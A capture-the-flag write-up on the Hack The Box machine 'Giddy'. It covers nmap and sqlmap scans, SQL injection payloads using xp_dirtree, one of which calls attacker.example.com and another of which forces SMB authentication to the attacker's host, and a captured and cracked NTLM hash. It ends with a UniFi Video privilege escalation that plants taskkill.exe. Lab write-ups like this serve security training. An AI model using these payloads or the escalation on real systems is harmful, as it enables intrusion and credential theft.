Writeup: Hack The Box - Giddy

Description

• Name: giddy
• IP: 10.10.10.104
• Author: lkys37en
• Difficulty: 6.2/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.104
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2018-09-14T07:59:14+00:00; +14s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2018-06-16T01:04:03
|_Not valid after:  2018-12-16T01:04:03
|_ssl-date: 2018-09-14T07:59:15+00:00; +14s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
301 -  147B  - /mvc  ->  http://10.10.10.104/mvc/
302 -  157B  - /Remote  ->  /Remote/default.aspx?ReturnUrl=%2fRemote
302 -  157B  - /remote  ->  /Remote/default.aspx?ReturnUrl=%2fremote

Pwn

On /remote,port 443, there is a login for a Windows Powershell Web Access service.

In /mvc there is a not-production ready store application.

Using sqlmap on the store page we immediately found out that it is vulnerable to SQLi.

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=8" --threads 10 --random-agent --level 5 --risk 3 --dbms=mssql

Port 3389 and 5985 are used for RDP and Windows Remote Management (WinRM) but we don’t have any credentials to use.

From the sqlmap we can investigate if there are any credentials on the Injection DB or in the master DB used by the store: not a single hash was found (not a shell).

Searching for a way to read files in the remote file system we found that mssql has a stored procedure to display a list of subdirectories: xp_dirtree.

EXEC master.sys.exp_dirtree 'C:\Users\stacy\Desktop\',0,1;.

Executing this command did not produced any output so we searched for other uses of the xp_dirtree function: Out of Band Exploitation.

This is a concept that can be used when exploiting lots of vulnerabilities such as SQLi, Command Injection, Cross-Site Scripting and XML Eternal Entity Injection.

The idea is fairly simple: instead of capturing the data you would like to retrieve and extract it though Boolean-logic, you can request the system to transmit the data over a protocol such as HTTP, SMB or DNS.

With a SQL Injection to perform this kind of exfiltration we can use functions such as:

MSSQL: master..xp_dirtree
MySQL: LOAD_FILE()

Supplying a hostname to these functions will cause a DNS lookup to occur; if you control the authoritative name server for a domain then you could see this DNS request in the logs of your server. Now at this to the fact that you can dynamically generate the hostname that is to be used, meaning you can smuggle data out in the subdomain of a domain that you control. A point to note though, is that hostnames have restrictions on the types of characters and the lengths of queries, so we recommend combining functions like SUBSTR() and HEX() to ensure that the length does not exceed the maximum allowed in subdomains and hex will encode any characters that cannot be used in a hostname.

So an example of the most simple payload would be:

EXEC master..xp_dirtree '\\attacker.example.com\foo' --

This would cause a DNS lookup to attacker.example.com if the system is vulnerable.

In out scenario we cannot use DNS exfiltration because the machine cannot interact to an external domain and with the IP is not possible to perform a UDP request like exfiltrateddata.10.10.10.10; it’s possible to use xp_dirtree to perform a SMBauthentication request though.

We can’t perform a SMB Relay Attack (CVE-2015–0005) since the machine will not get the payload for the reverse shell.

The web-store is vulnerable to stacked queries injection so we can trigger the authentication from Giddy to out machine using impacket (smbserver.py DODO .) and run:

GET /mvc/Product.aspx?ProductSubCategoryId=26;EXEC(%27master..xp_dirtree%20%22\\10.10.XX.XX\c$%22%27); HTTP/1.1
Host: 10.10.10.104
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

The authentication token from Stacy via SMB is:

STACY::GIDDY:4141414141414141:1180c58d21933073c98f307c65ea41a1:0101000000000000007265a3de4dd40167ae4f38230da87400000000010010004f004300470041004d00540069004c00020010007a0061006c00780065006a006c007900030010004f004300470041004d00540069004c00040010007a0061006c00780065006a006c00790007000800007265a3de4dd4010600040002000000080030003000000000000000000000000030000023128d4c0270edac6f1a291e9f7f831e122acbee8d0ff5c82a5e415c1f13611e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0039003500000000000000000000000000

Cracking the NTLM hash with hashcat (option -m 400) we got that Stacy’s password is xNmWo6272k7x.

Loggin in on the /remote endpoint we got an interactive powershell session and the first flag.

User flag

We tried to upgrade the shell to a meterpreter session but the machine has Windows Defender enabled and Powershell is in Constrained Mode (without Powershell version 2 enabled).

PS C:\Users\Stacy\Downloads>$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

In C:\Users\Stacy\Documents we saw a file called unifivideo: Unifi Video is a Ubiquiti service used to control and access video survelliance from remote. The installation path is in C:\ProgramData\unifi-video and from data\system.properties we read the software version:

# unifi-video v3.7.3
#Sat Jun 16 21:58:13 EDT 2018
is_default=false
uuid=e79d440a-62cd-4274-95c3-d746cbb3b817
# app.http.port = 7080
# app.https.port = 7443
# ems.liveflv.port = 6666
# ems.livews.port = 7445
# ems.livewss.port = 7446
# ems.rtmp.enable = true
# ems.rtmp.port = 1935
# ems.rtsp.enable = true
# ems.rtsp.port = 7447

From exploitdb we found a privilege escalation exploit for that version.

Ubiquiti UniFi Video for Windows is also shipped with a service called Ubiquiti UniFi Video. Its executable avService.exe is placed in the same directory and also runs under the NT AUTHORITY/SYSTEM account.
However the default permissions on the installation folder are inherited from the parent folder and are not explicitly overridden, which allows all users, even unprivileged ones, to append and write files to the application directory:

c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe.However this file does not exist in the application directory by default at all.

By copying an arbitrary taskkill.exe to the directory as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.

Initially we wrote a C program in Windows to copy the flag in a Stacy readable folder:

#include <stdio.h>

FILE *stream, *stream2;

int main(void) {
	errno_t err;
	char list[50];

	err = fopen_s(&stream, "C:\\Users\\Administrator\\Desktop\\root.txt", "r");
	if (err != 0) {
		printf("The file root.txt was not opened\n");
		return -1;
	}

	err = fopen_s(&stream2, "C:\\Users\\Stacy\\Desktop\\output.txt", "w+");
	if (err != 0) {
		printf("The file output.txt was not opened\n");
		fclose(stream);
		return -1;
	}

	fread(list, 50, 1, stream);
	printf("Contents of root.txt = %.50s\n", list);
	fprintf(stream2, list);

	fclose(stream);
	fclose(stream2);

	return 1;
}

Using Stop-Service and Start-Service for Ubiquiti UniFi Video we triggered the execution of the uploaded taskkill file to read the root flag!

Root Flag

We can also use some AV evasion technique to execute a meterpreter session.